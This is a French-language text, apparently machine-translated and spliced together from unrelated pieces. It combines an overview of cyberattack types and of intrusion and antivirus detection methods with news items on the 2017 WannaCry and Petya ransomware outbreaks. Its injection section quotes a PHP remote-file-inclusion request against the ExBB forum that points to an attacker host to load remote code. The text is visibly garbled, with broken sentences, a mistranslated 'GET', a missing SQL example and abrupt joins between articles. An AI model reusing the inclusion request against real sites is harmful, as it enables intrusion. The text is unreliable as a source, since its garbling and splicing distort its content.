Qu’entend-on par attaque de virus ? Virus abstraits et attaques de virus. Comment assurer une protection complète des installations d'infrastructure d'information critiques


Contenu:
Introduction
    Attaques de virus et leurs types.
    Outils de détection des attaques de virus.
Conclusion

Introduction
Une attaque de virus est une tentative sur un système informatique distant/local utilisant malware(virus).
Les attaques de virus constituent une méthode plus sophistiquée pour accéder à des informations sensibles, car les pirates informatiques utilisent des programmes spéciaux pour travailler sur l'ordinateur de la victime et se propager davantage (il s'agit de virus et de vers). De tels programmes sont conçus pour rechercher et transférer des informations secrètes à leur propriétaire, ou simplement pour nuire au système de sécurité et aux performances de l’ordinateur de la victime. Les principes de fonctionnement de ces programmes sont différents.
À l'heure actuelle, les attaques de virus constituent une menace sérieuse pour les utilisateurs ordinaires, sans parler des grandes entreprises, dont les informations peuvent être d'une énorme valeur. C'est pour cette raison que l'organisation et la réalisation d'attaques virales constituent une industrie à part entière qui intéresse non seulement les attaquants (criminels de réseau), mais également les fabricants de logiciels antivirus.
Nous sommes comme utilisateurs ordinaires Les PC doivent savoir comment se protéger des attaques de virus, comment ne pas devenir des participants accidentels, et pour cela, vous devez savoir de quoi il s'agit. attaque de virus, méthodes et modalités de leur application.

    Attaques de virus et leurs types.
Une attaque de virus est une action dont le but est de prendre le contrôle (élever les droits) d'un système informatique distant/local, de le déstabiliser ou de refuser un service.
    Bombardement de courrier
Elle est considérée comme la méthode d'attaque la plus ancienne, bien que son essence soit simple et primitive : un grand nombre messages électroniques rendent impossible le travail avec des boîtes aux lettres, et parfois même avec des serveurs de messagerie entiers. De nombreux programmes ont été développés à cet effet, et même un utilisateur inexpérimenté pourrait mener une attaque en indiquant uniquement l'e-mail de la victime, le texte du message et le nombre de messages requis. De nombreux programmes de ce type permettaient de masquer la véritable adresse IP de l'expéditeur, en utilisant un serveur de messagerie anonyme pour l'envoi. Cette attaque est difficile à prévenir, car même filtres de messagerie les fournisseurs ne peuvent pas déterminer le véritable expéditeur du spam. Le fournisseur peut limiter le nombre d'e-mails provenant d'un expéditeur, mais l'adresse et l'objet de l'expéditeur sont souvent générés de manière aléatoire.
    Débordement de tampon
Peut-être l’un des types d’attaques les plus courants sur Internet. Le principe de cette attaque repose sur l'utilisation d'erreurs logicielles pouvant provoquer une violation de la mémoire et faire planter l'application ou exécuter du code binaire arbitraire de la part de l'utilisateur sous lequel s'exécutait le programme vulnérable. Si le programme s'exécute sous compte administrateur système, puis cette attaque vous permettra d'obtenir un contrôle total sur l'ordinateur de la victime, il est donc recommandé de travailler sous le compte d'un utilisateur ordinaire disposant de droits limités sur le système, et sous le compte d'administrateur système pour effectuer uniquement les opérations qui nécessitent des droits d'administrateur.
    Intelligence réseau
Lors d’une telle attaque, aucune action destructrice n’est réellement réalisée, mais il peut ainsi obtenir des informations confidentielles sur la structure et les principes de fonctionnement du système informatique de la victime. Les informations obtenues peuvent être utilisées pour construire avec compétence une attaque à venir et sont généralement réalisées au cours des étapes préparatoires.
Lors d'une telle reconnaissance, un attaquant peut scanner les ports, Requêtes DNS, tests d'écho des ports ouverts, disponibilité et sécurité des serveurs proxy. En conséquence, vous pouvez obtenir des informations sur les adresses DNS existantes dans le système, à qui elles appartiennent, quels services y sont disponibles et le niveau d'accès à ces services pour les utilisateurs externes et internes.
    Reniflage de paquets
Il s'agit également d'un type d'attaque assez courant basé sur le fonctionnement d'une carte réseau en mode promiscuité, ainsi qu'en mode moniteur pour les réseaux Wi-Fi. Dans ce mode, tous les paquets reçus par la carte réseau sont envoyés à une application spéciale appelée renifleur pour traitement. En conséquence, un attaquant peut obtenir une grande quantité d'informations sur le service : qui, d'où et où les paquets ont été transmis, et par quelles adresses ces paquets sont passés. Le plus grand danger d’une telle attaque réside dans l’obtention des informations elles-mêmes, telles que les identifiants et mots de passe des employés, qui peuvent être utilisées pour accéder illégalement au système sous le couvert d’un simple employé de l’entreprise.
    Usurpation d'adresse IP
Il s'agit également d'un type d'attaque courant dans les réseaux insuffisamment protégés, lorsqu'un attaquant usurpe l'identité d'un utilisateur autorisé à l'intérieur ou à l'extérieur de l'organisation. Pour ce faire, le pirate doit utiliser une adresse IP autorisée dans le système de sécurité du réseau. Une telle attaque est possible si le système de sécurité permet l'identification de l'utilisateur uniquement par adresse IP et ne nécessite pas de confirmation supplémentaire.
    L'homme du milieu
Type d'attaque lorsqu'un attaquant intercepte un canal de communication entre deux systèmes et accède à toutes les informations transmises. Une fois l'accès obtenu à ce niveau, l'attaquant peut modifier les informations comme il le souhaite pour atteindre ses objectifs. Le but d'une telle attaque est de voler ou de falsifier les informations transmises, ou d'accéder aux ressources du réseau. De telles attaques sont extrêmement difficiles à suivre car l’attaquant se trouve généralement au sein de l’organisation.
    Injection
Une attaque associée à divers types d'injections implique l'introduction de commandes ou de données tierces dans un système en cours d'exécution afin de modifier le cours du fonctionnement du système et, par conséquent, d'accéder à réceptions privées et l'information, ou la déstabilisation du système dans son ensemble. Ce type d'attaque est le plus répandu sur Internet, mais peut également être mené via la ligne de commande du système.
L'injection SQL est une attaque au cours de laquelle les paramètres des requêtes SQL vers une base de données sont modifiés. En conséquence, la requête prend un sens complètement différent, et en cas de filtrage insuffisant des données d'entrée, elle peut non seulement afficher des informations confidentielles, mais également modifier/supprimer les données. Très souvent ce type d'attaque peut être observé sur l'exemple des sites qui utilisent des paramètres de ligne de commande (en dans ce cas- Variables URL) pour construire des requêtes SQL sur des bases de données sans vérification appropriée.
Au lieu de vérifier, vous pouvez remplacer une déclaration qui, si elle est vraie, contournera la vérification

L'injection PHP est l'un des moyens de pirater des sites Web fonctionnant sur PHP. Elle consiste à injecter un script malveillant spécialement conçu dans le code de l'application web côté serveur du site, ce qui conduit à l'exécution de commandes arbitraires. On sait que de nombreux moteurs et forums gratuits fonctionnant sur PHP et répandus sur Internet (le plus souvent il s'agit de versions obsolètes) contiennent des modules mal conçus ou des conceptions individuelles présentant des vulnérabilités. Les crackers analysent les vulnérabilités telles que les variables non échappées recevant des valeurs externes, par exemple une ancienne vulnérabilité du forum ExBB utilisée par les pirates avec la requête :
OBTENEZ //modules/threadstop/threadstop.php?new_exbb=evilhackerscorp.com/tx. SMS????? .
Le cross-site scripting, ou XSS, est un type de vulnérabilité couramment rencontré dans les applications Web qui permet à des utilisateurs malveillants d'injecter du code dans des pages Web consultées par d'autres utilisateurs. Des exemples de ce type de code sont le code HTML et les scripts côté client, le plus souvent JavaScript. Autres noms : CSS, moins communément - injection de script.
L'injection XPath est un type de vulnérabilité qui implique l'injection d'expressions XPath dans la requête d'origine de la base de données. Données XML. Comme pour d’autres types d’injections, une vulnérabilité est possible en raison d’une vérification insuffisante des données d’entrée.

    Déni de service
DoS (de l'anglais Denial of Service) est une attaque visant à empêcher le serveur de répondre aux requêtes. Ce type d’attaque n’implique pas l’obtention d’informations secrètes, mais peut parfois permettre de lancer d’autres attaques. Par exemple, certains programmes, en raison d'erreurs dans leur code, peuvent provoquer des exceptions, et lorsque les services sont désactivés, ils peuvent exécuter du code fourni par un attaquant ou des attaques par inondation, lorsque le serveur ne peut pas traiter un grand nombre de paquets entrants.
DDoS (de l'anglais Distributed Denial of Service - Distributed DoS) est un sous-type d'attaque DoS qui a le même objectif que DoS, mais est effectué non pas à partir d'un ordinateur, mais à partir de plusieurs ordinateurs du réseau. Ces types d'attaques utilisent soit l'apparition d'erreurs conduisant à une panne de service, soit le déclenchement d'une protection, conduisant à un blocage du service, et par conséquent à un déni de service. Le DDoS est utilisé là où le DoS classique est inefficace. Pour ce faire, plusieurs ordinateurs sont combinés, et chacun produit Attaque DoS sur le système de la victime. Ensemble, cela s’appelle une attaque DDoS.
Toute attaque n'est rien de plus qu'une tentative d'utiliser l'imperfection du système de sécurité de la victime soit pour obtenir des informations, soit pour endommager le système. La raison de toute attaque réussie est donc le professionnalisme du pirate et la valeur de l'information, ainsi que la compétence insuffisante de l'administrateur du système de sécurité, en particulier l'imperfection de la fourniture de logiciels et l'attention insuffisante accordée aux problèmes de sécurité dans l'entreprise dans son ensemble.
    Outils de détection des attaques de virus.
À l'heure actuelle, les logiciels antivirus sont développés principalement pour le système d'exploitation Famille Windows de Microsoft, qui est causé par un grand nombre de programmes malveillants spécifiquement destinés à cette plate-forme (et ceci, à son tour, est dû à la grande popularité de ce système d'exploitation, ainsi qu'à un grand nombre d'outils de développement, y compris des outils gratuits et même " instructions pour écrire des virus »). Des produits destinés à d'autres plates-formes arrivent actuellement sur le marché. ordinateurs de bureau, comme Linux et Mac OS X. Cela est dû au début de la propagation de logiciels malveillants pour ces plates-formes, bien que Systèmes de type UNIX ont toujours été réputés pour leur fiabilité. Par exemple, la célèbre vidéo « Mac ou PC » montre avec humour l'avantage de Mac OS sur Windows et la plus grande immunité antivirus de Mac OS par rapport à Windows.

Outre les systèmes d'exploitation pour ordinateurs de bureau et portables, il existe également des plates-formes pour appareils mobiles, tel que Windows Mobile, Symbian, iOS, BlackBerry, Android, Windows Phone 7, etc. Les utilisateurs d'appareils exécutant ces systèmes d'exploitation courent également un risque d'infection par des logiciels malveillants, c'est pourquoi certains développeurs programmes antivirus Ils fabriquent également des produits pour de tels appareils.

Classification des produits antivirus
Les produits antivirus peuvent être classés selon plusieurs critères, tels que : les technologies de protection antivirus utilisées, les fonctionnalités du produit et les plates-formes cibles.

Par technologie utilisée protection antivirus:

    Produits antivirus classiques (produits qui utilisent uniquement des méthodes de détection basées sur les signatures)
    Produits de protection antivirus proactive (produits qui utilisent uniquement des technologies de protection antivirus proactives) ;
    Produits combinés (produits utilisant à la fois des méthodes de protection classiques basées sur les signatures et des méthodes proactives)
Par fonctionnalité du produit :
    Produits antivirus (produits qui fournissent uniquement une protection antivirus)
    Produits combinés (produits qui fournissent non seulement une protection contre les logiciels malveillants, mais également un filtrage du spam, un cryptage et une sauvegarde des données, ainsi que d'autres fonctions)
L'efficacité d'un système de détection d'attaque dépend en grande partie des méthodes utilisées pour analyser les informations reçues. Les premiers systèmes de détection d'intrusion, développés au début des années 1980, utilisaient des méthodes statistiques pour détecter les attaques. Actuellement, un certain nombre de nouvelles techniques ont été ajoutées à l'analyse statistique, à commencer par systèmes experts et la logique floue à l'utilisation des réseaux de neurones.
    Méthode statistique
Les principaux avantages de l'approche statistique sont l'utilisation d'un appareil de statistique mathématique déjà développé et éprouvé et l'adaptation au comportement du sujet.
Premièrement, des profils sont déterminés pour tous les sujets du système analysé. Tout écart du profil utilisé par rapport à celui de référence est considéré comme une activité non autorisée. Les méthodes statistiques sont universelles car l’analyse ne nécessite pas de connaissance des attaques possibles et des vulnérabilités qu’elles exploitent. Cependant, lors de l'utilisation de ces techniques, des problèmes surviennent :
      les systèmes « statistiques » ne sont pas sensibles à l’ordre des événements ; dans certains cas, les mêmes événements, selon l'ordre dans lequel ils se produisent, peuvent caractériser une activité anormale ou normale ;
      il est difficile de fixer les valeurs limites (seuils) des caractéristiques surveillées par le système de détection d'attaque afin d'identifier de manière adéquate les activités anormales ;
      Les systèmes « statistiques » peuvent être « entraînés » par les attaquants au fil du temps afin que les actions d'attaque soient considérées comme normales.
Il convient également de tenir compte du fait que les méthodes statistiques ne sont pas applicables dans les cas où il n'existe aucun modèle de comportement typique pour l'utilisateur ou lorsque des actions non autorisées sont typiques de l'utilisateur.
    Systèmes experts
Les systèmes experts consistent en un ensemble de règles qui capturent les connaissances d'un expert humain. L'utilisation de systèmes experts est une méthode courante de détection d'attaques dans laquelle les informations sur l'attaque sont formulées sous forme de règles. Ces règles peuvent être écrites, par exemple, sous forme d’une séquence d’actions ou sous forme de signature. Lorsque l'une de ces règles est respectée, une décision est prise concernant la présence d'une activité non autorisée. Un avantage important de cette approche est l’absence presque totale de fausses alarmes.
La base de données du système expert doit contenir des scripts pour la plupart des attaques actuellement connues. Afin de rester constamment à jour, les systèmes experts nécessitent une mise à jour constante de la base de données. Bien que les systèmes experts offrent bonne opportunité Pour afficher les données du journal, les mises à jour requises peuvent être ignorées ou effectuées manuellement par l'administrateur. Au minimum, cela se traduit par un système expert aux capacités affaiblies. Dans le pire des cas, le manque de maintenance appropriée réduit la sécurité de l’ensemble du réseau, induisant ainsi les utilisateurs en erreur sur le niveau réel de sécurité.
Le principal inconvénient est l’incapacité de repousser les attaques inconnues. De plus, même une légère modification d'une attaque déjà connue peut devenir un obstacle sérieux au fonctionnement du système de détection d'attaque.
    Réseaux de neurones
La plupart des méthodes modernes de détection des attaques utilisent une certaine forme d’analyse spatiale contrôlée, soit une approche basée sur des règles, soit une approche statistique. L'espace contrôlé peut être constitué de journaux ou de trafic réseau. L'analyse est basée sur un ensemble de règles prédéfinies créées par l'administrateur ou le système de détection d'intrusion lui-même.
Toute séparation d'une attaque dans le temps ou entre plusieurs attaquants est difficile à détecter à l'aide de systèmes experts. En raison de la grande variété d'attaques et de pirates informatiques, même ponctuels, les mises à jour continues de la base de données des règles du système expert ne garantiront jamais une identification précise de l'ensemble des attaques.
L’utilisation des réseaux de neurones est une des voies pour pallier ces problèmes des systèmes experts. Contrairement aux systèmes experts, qui peuvent donner à l'utilisateur une réponse définitive sur la conformité des caractéristiques considérées avec les règles intégrées dans la base de données, un réseau de neurones analyse les informations et offre la possibilité d'évaluer si les données sont cohérentes avec les caractéristiques qu'elles contiennent. formés à reconnaître. Bien que le degré de correspondance d'une représentation d'un réseau neuronal puisse atteindre 100 %, la fiabilité du choix dépend entièrement de la qualité du système dans l'analyse des exemples de la tâche à accomplir.
Tout d’abord, le réseau neuronal est entraîné à s’identifier correctement à l’aide d’un échantillon d’exemples présélectionnés. domaine. La réponse du réseau neuronal est analysée et le système est ajusté de manière à obtenir des résultats satisfaisants. En plus de la période de formation initiale, le réseau neuronal acquiert de l'expérience au fil du temps en analysant les données spécifiques au domaine.
Un avantage important des réseaux neuronaux dans la détection des abus est leur capacité à « apprendre » les caractéristiques des attaques délibérées et à identifier les éléments qui ne ressemblent pas à ceux observés précédemment sur le réseau.
Chacune des méthodes décrites présente un certain nombre d'avantages et d'inconvénients, il est donc désormais presque difficile de trouver un système qui implémente une seule des méthodes décrites. En règle générale, ces méthodes sont utilisées en combinaison.

Détection basée sur les signatures
La détection basée sur les signatures est une méthode de fonctionnement des systèmes antivirus et de détection d'intrusion dans laquelle le programme, lors de l'analyse d'un fichier ou d'un package, accède à un dictionnaire de virus connus compilé par les auteurs du programme. Si une partie du code du programme affiché correspond à un code de virus connu (signature) dans le dictionnaire, le programme antivirus peut effectuer l'une des actions suivantes :

      Supprimez le fichier infecté.
      Envoyez le fichier en « quarantaine » (c'est-à-dire, rendez-le indisponible pour l'exécution, afin d'empêcher une propagation ultérieure du virus).
      Essayez de restaurer le fichier en supprimant le virus lui-même du corps du fichier.
Pour obtenir un succès à suffisamment long terme, lors de l'utilisation de cette méthode, il est nécessaire de réapprovisionner périodiquement le dictionnaire. virus connus nouvelles définitions (principalement en ligne). Ayant le sens du civisme et des utilisateurs techniquement avertis, ayant découvert le « live » nouveau virus, peut envoyer le fichier infecté aux développeurs de programmes antivirus, qui incluront ensuite le nouveau virus dans le dictionnaire.
Les programmes antivirus, conçus pour correspondre à la définition d'un virus dans le dictionnaire, analysent généralement les fichiers lorsqu'un système informatique crée, ouvre, ferme ou envoie des fichiers par courrier électronique. De cette façon, les virus peuvent être détectés immédiatement après leur introduction dans l’ordinateur et avant qu’ils puissent causer des dommages. Il convient de noter que l'administrateur système peut créer un programme pour le programme antivirus, selon lequel tous les fichiers du disque dur peuvent être visualisés (analysés).
Bien que les programmes antivirus créés en correspondant à la définition d'un virus dans le dictionnaire puissent, dans des circonstances normales, être très efficaces pour prévenir les épidémies d'infections informatiques, les auteurs de virus tentent de garder une demi-longueur d'avance sur ces programmes antivirus en créant des programmes "oligomorphes", "polymorphes". et, plus récemment, les virus « métamorphiques », dans lesquels certaines parties du code sont réécrites, modifiées, cryptées ou déformées de telle sorte qu'il est impossible de détecter une correspondance avec la définition du dictionnaire des virus.
Une description de l'une des méthodes d'analyse du matériel est disponible sur le lien. Elle consiste à analyser simultanément le flux de données avec un dispositif spécial appelé coprocesseur de contexte.

Création et distribution de signatures
Les signatures antivirus sont créées à la suite d'une analyse minutieuse de plusieurs copies d'un fichier appartenant à un seul virus. La signature doit contenir uniquement des lignes uniques de ce fichier, si spécifiques qu'elles garantissent le minimum de risques de faux positifs - la principale priorité de toute société antivirus.
Le développement de signatures est un processus manuel difficile à automatiser. Malgré de nombreuses recherches consacrées à la génération automatique de signatures, le polymorphisme (et le « métamorphisme ») croissant des virus et des attaques prive les signatures syntaxiques de tout leur sens. Les sociétés antivirus sont obligées de produire un grand nombre de signatures pour toutes les variantes d'un même virus, et sans la loi de Moore, aucun ordinateur moderne ne serait capable de terminer l'analyse d'un grand nombre de fichiers avec une telle masse de signatures dans un délai raisonnable. .
Dans leur forme actuelle, les bases de signatures doivent être mises à jour régulièrement, car la plupart des antivirus ne sont pas capables de détecter seuls les nouveaux virus. Tout propriétaire de logiciel basé sur les signatures est condamné à dépendre régulièrement des mises à jour des signatures, qui constituent la base du modèle économique des fabricants d'antivirus et d'IDS.
La livraison en temps opportun de nouvelles signatures aux utilisateurs constitue également un défi majeur pour les éditeurs de logiciels. Les virus et vers modernes se propagent à une telle vitesse qu’au moment où une signature est publiée et transmise à l’ordinateur de l’utilisateur, l’épidémie peut déjà atteindre son point culminant et couvrir le monde entier. Selon les données publiées, la délivrance d'une signature prend entre 11 et 97 heures selon le fabricant, alors qu'en théorie, un virus peut envahir tout Internet en moins de 30 secondes.
Dans la plupart des logiciels de sécurité, la base de données de signatures constitue le cœur du produit, la partie la plus longue et la plus précieuse. C'est pourquoi la plupart des fournisseurs préfèrent garder leurs signatures fermées - bien qu'il existe des logiciels open source dans ce domaine (par exemple ClamAV), ainsi que des recherches sur l'ingénierie inverse des signatures fermées. Virus Bulletin publiait régulièrement les signatures de nouveaux virus jusqu'en 2000.
Les problèmes de développement des signatures et la mauvaise distribution de certains types de logiciels malveillants conduisent au fait que les signatures développées par différentes sociétés antivirus contiennent des définitions pour différents sous-ensembles de virus. Ce problème peut être résolu en développant norme internationale pour une description des signatures antivirus, qui contiendront les informations nécessaires pour détecter, identifier et éliminer les logiciels malveillants. L'effet maximal d'une telle norme peut être obtenu en mettant en œuvre base centralisée connaissances sur les logiciels malveillants, dans lesquelles tous les éditeurs d'antivirus auront le droit d'écrire de nouvelles signatures (ou de modifier celles existantes). Mais dans un tel stockage centralisé (base de données), chaque enregistrement doit avoir une signature numérique de l'auteur (une entreprise spécifique), ce qui protégera les utilisateurs finaux des attaques sur base de données locale signatures en empoisonnant son contenu. De plus, lorsque de nouveaux enregistrements sont ajoutés au référentiel central de signatures, la notation des entreprises manufacturières devrait changer. Cette notation intéressera les entreprises, puisque l’utilisateur pourra évaluer directement leur travail.

Inconvénients et avantages des signatures syntaxiques

      Vous permet d'identifier une attaque spécifique avec une grande précision et une faible proportion de faux appels
      Impossible de détecter de nouvelles attaques
      Sans défense contre virus polymorphes et versions modifiées du même virus
      Nécessite des mises à jour régulières et extrêmement rapides
      Nécessite une analyse manuelle minutieuse des virus
La méthode d'analyse heuristique est conçue pour améliorer la capacité des scanners à appliquer des signatures et à reconnaître les virus modifiés dans les cas où la signature ne correspond pas à 100 % au corps d'un programme inconnu. Cette technologie est cependant utilisée avec beaucoup de prudence dans les programmes modernes, car elle peut augmenter le nombre de faux positifs.

Défense proactive
Les technologies proactives sont un ensemble de technologies et de méthodes utilisées dans les logiciels antivirus dont l'objectif principal, contrairement aux technologies réactives (de signature), est d'empêcher l'infection du système de l'utilisateur et de ne pas rechercher des logiciels malveillants déjà connus dans le système. .

Historique du développement des technologies de protection antivirus proactives

Les technologies proactives ont commencé à se développer presque simultanément avec les technologies classiques (signature). Cependant, les premières mises en œuvre de technologies de protection antivirus proactives ont nécessité haut niveau qualifications des utilisateurs, c'est-à-dire n'ont pas été conçus pour utilisation de masse utilisateurs ordinaires d’ordinateurs personnels. Après une décennie dans l’industrie antivirus, il est devenu clair que les méthodes de détection basées sur les signatures ne peuvent plus protéger efficacement les utilisateurs. Ce fait a conduit à la renaissance des technologies proactives.

Technologies de défense proactives :

    Analyse heuristique
La technologie d'analyse heuristique permet, à partir d'une analyse du code d'une application, d'un script ou d'une macro en cours d'exécution, de détecter les sections de code responsables d'une activité malveillante.
L'efficacité de cette technologie n'est pas élevée, ce qui est dû au grand nombre de faux positifs lorsque la sensibilité de l'analyseur est augmentée, ainsi qu'à un large éventail de techniques utilisées par les auteurs de logiciels malveillants pour contourner le composant heuristique des logiciels antivirus.
    Émulation de code
La technologie d'émulation vous permet d'exécuter une application dans un environnement d'émulation, émulant le comportement du système d'exploitation ou processeur central. Lors de l'exécution d'une application en mode émulation, l'application ne pourra pas endommager le système de l'utilisateur et l'action malveillante sera détectée par l'émulateur.
Malgré l'efficacité apparente de cette approche, elle n'est pas non plus sans inconvénients : l'émulation prend trop de temps et de ressources sur l'ordinateur de l'utilisateur, ce qui affecte négativement les performances des opérations quotidiennes. De plus, les logiciels malveillants modernes sont capables de détecter l'exécution dans un environnement émulé ; et y arrêter son exécution.
    Analyse du comportement
La technologie d'analyse du comportement est basée sur l'interception de toutes les fonctions importantes du système ou sur l'installation de ce qu'on appelle. des mini-filtres, qui vous permettent de suivre toutes les activités sur le système de l’utilisateur. La technologie d'analyse comportementale vous permet d'évaluer non seulement une action unique, mais également une chaîne d'actions, ce qui augmente considérablement l'efficacité de la lutte contre les menaces virales. En outre, l'analyse comportementale constitue la base technologique de toute une classe de programmes - les bloqueurs comportementaux (HIPS - Host-based Intrusion Systems).
etc.............

DANS derniers jours Au cours de la semaine dernière, une vague d’ordinateurs infectés par un virus de chiffrement s’est produite dans le monde entier. À la fois des citoyens ordinaires et des commerciaux et des entreprises d'État et des établissements. Selon les dernières données, des ordinateurs provenant d'au moins 150 pays ont été touchés. Mais malgré son caractère répandu, le virus n’a pas touché toutes les voitures. Comment est-ce arrivé ?

14 05 2017
21:41

Commençons par quelque chose de simple : la plupart des virus pénètrent dans un ordinateur en y téléchargeant un fichier infecté. Le plus souvent, il s'agit d'un fichier exécutable qui nécessite un lancement ou s'exécute tout seul. Afin d'éviter l'activation spontanée de tels programmes, le système Sécurité Windows vous demande votre consentement pour effectuer une action avec le fichier nouvellement installé. Si vous n'autorisez pas l'exécution de l'application, le processus sera automatiquement terminé.

Virus qui se propagent à l'intérieur réseau local ou par transmission en utilisant appareils externes(disques, cartes mémoire), le système ne peut pas toujours les détecter. Pour cela, il existe une deuxième ligne de défense : l’antivirus. Un tel logiciel vous permet d'analyser les médias à la recherche de logiciels malveillants et d'effectuer des analyses régulières de votre ordinateur. Les antivirus les plus courants (NOD 32, Avast, Avira, Laboratoire Kaspersky.) disposent d'une large base de données sur les dangers possibles, qui est régulièrement mise à jour par le fabricant du programme. Comment base plus large, ceux plus probable le fait que le virus qui pénètre sur votre machine y est inclus, ce qui signifie qu'il sera rapidement détecté.

Une infection informatique n’est pas toujours immédiatement perceptible. Souvent, les problèmes commencent par un ralentissement du fonctionnement du système, une réduction progressive espace libre sur des disques ou des mots de passe « volants » remplis et stockés. À un moment donné, l'ordinateur cesse de fonctionner normalement : il refuse de démarrer ou de lancer certains services et programmes et s'éteint spontanément après un certain temps. Que faire à ce sujet ?

Tout d’abord, ne paniquez pas. Si vous n'êtes pas sûr de pouvoir résoudre le problème vous-même, éteignez votre ordinateur et contactez un spécialiste. Lorsqu’ils sont éteints, les virus ne se propagent pas, vous n’aggraverez donc certainement pas les choses.

Si tout n'est pas si triste (par exemple, l'ordinateur démarre, mais des fenêtres étranges, des inscriptions, etc. apparaissent périodiquement), vous devez alors exécuter une analyse antivirus. Si des problèmes sont détectés, traitez et supprimez les fichiers endommagés. Le programme de protection lui-même vous dira quoi et comment faire avec les coupables de ce qui se passe.

Cependant, certains virus bloquent l’exécution des logiciels capables de les détecter. A cet effet, de grands développeurs ont créé service spécial pour analyser votre ordinateur à la recherche de logiciels malveillants sans installer d'application. L'utilisateur exécute un fichier exécutable sur l'ordinateur qui, via un canal Internet, établit une connexion à la base de données virale et analyse la machine. Une fois détectés, les fichiers infectés doivent également être supprimés.

Les virus de chiffrement peuvent également être « guéris ». Cependant, pour décrypter vos données, vous aurez besoin d’un code que les criminels sont censés envoyer à leurs victimes. Pour les anciennes versions programmes similaires Les codes sont connus et peuvent être consultés gratuitement sur Internet.

Mais le dernier virus qui a frappé le monde entier ne possédait pas de tels codes. Il s'est répandu sur le réseau et il n'était pas du tout nécessaire d'installer quoi que ce soit sur l'ordinateur : le ransomware s'accrochait tout seul à la machine. Lorsque vous essayez de le faire rapidement (avant que le message d'infection n'apparaisse) en utilisant les méthodes ci-dessus, il apparaît à nouveau, ouvrant tôt ou tard une fenêtre contenant des informations indiquant que votre appareil a été piraté. Ce virus peut être traité, mais le moyen le plus simple consiste à réinstaller l’intégralité du système. Dans tous les cas, tous les fichiers audio, vidéo, images et documents texte, car ils sont déjà cryptés, une mise à jour complète du système sera donc tout simplement plus solution rapide. Des moyens efficaces Il n'existe pas encore de moyen de sauvegarder et de décrypter des fichiers.

Mais pourquoi n’a-t-il pas touché tous les ordinateurs ? Outre le fait que tous les utilisateurs n'étaient pas en ligne lors de l'attaque, certains ordinateurs actifs a été protégé par la mise à jour de Windows. Oui, c'est vrai. Ceux qui n’ont pas décoché la case « autoriser » installation automatique les mises à jour" étaient sûres, car vulnérabilité critique, utilisé par ce ransomware, a été éliminé il y a plus d'un mois.

Pour empêcher quelque chose de ce genre de voler à travers le réseau en toute impunité, vous devez utiliser un autre mécanisme de défense- pare-feu. Il s'agit en gros d'un filtre de données arrivant sur votre ordinateur via le réseau. Il bloque souvent le fonctionnement de programmes, jeux et packages inoffensifs avec un créateur inconnu, ce qui peut être très gênant situation normale. Mais la protection n’est qu’une protection.

Sois prudent. Dupliquez vos documents sur des supports externes et cloud.

Dmitry Potapkin, notamment pour Obzor.press.

La menace la plus puissante et la plus sérieuse utilisateurs d'ordinateurs Ce sont des attaques de virus. Ils rendent les choses difficiles travail important avec des données et des documents. Il est impératif que chaque utilisateur d'ordinateur connaisse les logiciels et les services qui peuvent aider à protéger les appareils contre les attaques. Toutes les mesures possibles doivent être prises pour garantir la protection des systèmes informatiques. Les principales sources d'attaques virales sont répertoriées ci-dessous.

Programmes téléchargeables

L'un des sources possibles Les attaques de virus sont des programmes téléchargés sur Internet. Les sources non fiables et les groupes de discussion en ligne sont l'une des principales sources de logiciels malveillants. Les fichiers téléchargés sont l'un des meilleurs distributeurs de virus. N'importe quel type programme exécutable, y compris les jeux, applications gratuites, ajouts d'écran et fichiers exécutables, est l’une des principales sources d’attaques de virus informatiques. Ces données portant l'extension « .com », « .exe » et « coolgame.exe » contiennent également des scripts malveillants. Par conséquent, dans tous les cas lorsque vous souhaitez télécharger des programmes depuis Internet, vous devez analyser chacun d’eux avant de les lancer.

Logiciel craqué

Les cracks sont une autre source d’attaques virales. La plupart des gens qui téléchargent sont piratés et versions piratées logiciel en ligne ne savent pas qu'ils peuvent contenir des virus. Ces formulaires de fichiers contiennent des scripts malveillants et des erreurs difficiles à détecter et également difficiles à supprimer. Par conséquent, télécharger le logiciel à partir de la source appropriée est toujours l’option privilégiée.

Pièces jointes aux e-mails

Ils constituent également l’une des sources les plus répandues d’attaques de virus informatiques. Par conséquent, vous devez traiter les pièces jointes avec une extrême prudence, surtout si l’e-mail provient d’un expéditeur inconnu. Installation bon antivirus est une nécessité primordiale si vous souhaitez éliminer ce risque. Besoin de scanner e-mail, même si cela vient d'un ami. Il est possible qu'un autre utilisateur soit, sans le savoir, porteur du virus redirigé ainsi que de la pièce jointe de l'e-mail.

Internet est la meilleure source d'attaques de virus en 2017

Il est indéniable qu’Internet est l’une des sources de virus les plus courantes, surtout de nos jours. Ce fait n’est pas une surprise et il ne sert certainement à rien de couper l’accès à Internet à l’avenir. La plupart des utilisateurs d’ordinateurs ne savent pas quand les virus attaquent les systèmes informatiques. Presque tous les utilisateurs cliquent sur les liens et téléchargent tout ce que propose le navigateur et, par conséquent, autorisent inconsciemment la possibilité d'attaques de virus.

Démarrage à partir d'un support inconnu

L'une des autres sources courantes d'attaques de virus est un disque ou un lecteur flash inconnu. La plupart des utilisateurs d'ordinateurs pensent que l'un des moyens les plus courants de contracter un virus est support amovible avec des données. Il est recommandé de retirer le disque ou la clé USB lorsque le système informatique ne fonctionne pas. Si vous ne retirez pas le support après avoir éteint votre appareil, il peut démarrer automatiquement à partir de celui-ci.

Cela peut augmenter la capacité d'installer et d'exécuter des fichiers/programmes sur un site spécifique. système informatique. Outre les sources mentionnées ci-dessus (telles que Bearshare, Kazaa et Limewire) sont parfois également des sources d'attaques de virus. Par conséquent, il est nécessaire de supprimer les fichiers téléchargés des réseaux de communication mentionnés ci-dessus pour éliminer la possibilité d'une infection virale.

Nouvelle attaque de virus

De nombreuses organisations en Europe et aux États-Unis ont été touchées par des attaques de ransomwares. Cela était dû à l’action d’un virus connu sous le nom de « Petya ». s'est propagé à travers de grandes entreprises, notamment l'annonceur WPP, l'entreprise alimentaire Mondelez, le cabinet d'avocats DLA Piper et la société danoise d'expédition et de transport Maersk, entraînant le blocage des données des PC et des demandes de rançon ultérieures.

Il s’agit de la deuxième attaque mondiale majeure de ransomware en 2017. Début mai Service national Le système de santé britannique (NHS) est devenu le premier parmi les organisations infectées Virus WannaCry, qui exploitait une vulnérabilité du système. Comme on l'a appris plus tard, il a été publié sur Internet en avril par un groupe de pirates informatiques se faisant appeler « Shadow Brokers ».

L'attaque WannaCry a touché plus de 230 000 ordinateurs dans plus de 150 pays, dont le NHS en Espagne. compagnie de téléphone Telefónica et les chemins de fer allemands. Comme WannaCry, Petya se propage rapidement sur les réseaux exécutant Microsoft Windows, mais de quoi s'agit-il et comment peut-il être arrêté ?

